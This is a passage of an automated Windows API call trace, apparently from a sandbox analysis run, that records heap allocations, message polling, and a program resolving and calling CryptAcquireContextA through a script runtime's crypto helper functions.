HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0246.081] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50db8 [0246.081] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542b0 [0246.081] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0246.081] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d08 [0246.081] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0246.081] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0246.081] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0246.081] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0246.081] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0246.081] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0246.081] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0246.082] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0246.082] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0246.082] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0246.082] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0246.082] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0246.082] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54418 | out: hHeap=0x970000) returned 1 [0246.082] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0246.082] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542b0 | out: hHeap=0x970000) returned 1 [0246.082] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50db8 | out: hHeap=0x970000) returned 1 [0246.082] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0246.082] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0246.082] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0246.082] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0246.082] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0246.082] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cf8 [0246.082] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0246.082] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0246.082] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0246.082] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0246.082] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54300 [0246.082] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ed8 [0246.082] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ba8 [0246.082] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fb0 [0246.082] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d40 [0246.082] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cf8 | out: hHeap=0x970000) returned 1 [0246.082] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0246.082] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0246.082] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0246.082] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0246.082] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0246.083] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0246.083] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54120 [0246.083] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e78 [0246.083] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f38 [0246.083] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0246.083] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0246.083] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0246.083] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0246.083] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0246.083] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cf8 | out: hHeap=0x970000) returned 1 [0246.083] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0246.083] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0246.083] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0246.083] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0246.083] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0246.083] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55a40 | out: hHeap=0x970000) returned 1 [0246.083] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0246.084] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0246.084] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0246.084] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0246.084] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2e69b88, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0246.084] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0246.084] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54210 [0246.084] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b88 | out: hHeap=0x970000) returned 1 [0246.084] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContext") returned 0x0 [0246.084] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54210 | out: hHeap=0x970000) returned 1 [0246.084] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0246.084] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0246.084] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55c00 [0246.084] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0246.084] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0246.084] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0246.084] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x15) returned 0x2e69b08 [0246.084] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2e69b08, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0246.084] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0246.085] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542d8 [0246.085] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0246.085] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContextA") returned 0x756ffc40 [0246.085] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542d8 | out: hHeap=0x970000) returned 1 [0246.085] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0246.085] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55c00 | out: hHeap=0x970000) returned 1 [0246.085] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0246.085] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e698c8 [0246.085] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0246.085] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0246.085] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0246.085] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0246.085] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0246.085] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0246.085] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0246.085] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0246.085] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0246.085] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0246.085] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0246.085] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa5f958) returned 1 [0246.086] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0246.086] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69c28 [0246.086] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0246.086] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512b0 [0246.086] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511d8 [0246.086] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0246.086] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0246.086] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0246.086] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0246.086] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0246.086] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51280 [0246.086] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0246.086] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0246.086] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0246.086] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0246.087] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0246.087] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0246.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511d8 [0246.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0246.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fe0 [0246.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0246.087] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0246.087] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0246.087] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0246.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0246.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51208 [0246.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fc8 [0246.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0246.087] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0246.087] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0246.087] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0246.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0246.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0246.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51040 [0246.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0246.087] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0246.087] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0246.087] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0246.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0246.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fe0 [0246.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51208 [0246.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0246.087] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0246.087] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0246.088] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0246.088] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0246.088] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0246.088] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0246.088] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0246.088] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0246.088] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54260 | out: hHeap=0x970000) returned 1 [0246.088] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0246.088] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0246.088] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0246.088] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0246.088] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0246.088] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0246.088] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ea8 | out: hHeap=0x970000) returned 1 [0246.088] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cf8 | out: hHeap=0x970000) returned 1 [0246.088] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50db8 | out: hHeap=0x970000) returned 1 [0246.088] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0246.088] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0246.088] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0246.088] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0246.088] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0246.088] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0246.088] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0246.088] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0246.088] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0246.088] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0246.088] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e30 | out: hHeap=0x970000) returned 1 [0246.088] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0246.088] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0246.088] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0246.088] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0246.089] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0246.089] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0246.089] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0246.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e561a8 [0246.089] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0246.089] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0246.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0246.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0246.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0246.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a28 [0246.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0246.089] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0246.089] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0246.089] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0246.089] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0246.089] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0246.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a08 [0246.089] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0246.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e56028 [0246.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0246.274] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0246.274] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56028 | out: hHeap=0x970000) returned 1 [0246.275] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0246.275] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0246.275] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54cc8 [0246.275] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cf8 [0246.275] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0246.275] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0246.275] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0246.275] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0246.275] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0246.275] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50d10 [0246.275] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54260 [0246.275] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f20 [0246.275] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d08 [0246.275] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0246.275] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54170 [0246.275] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50dd0 [0246.275] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0246.275] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0246.275] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0246.275] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0246.275] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0246.276] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0246.276] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0246.276] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0246.276] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0246.276] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ce0 [0246.276] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0246.276] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0246.276] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0246.276] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0246.276] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0246.276] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0246.276] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0246.276] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 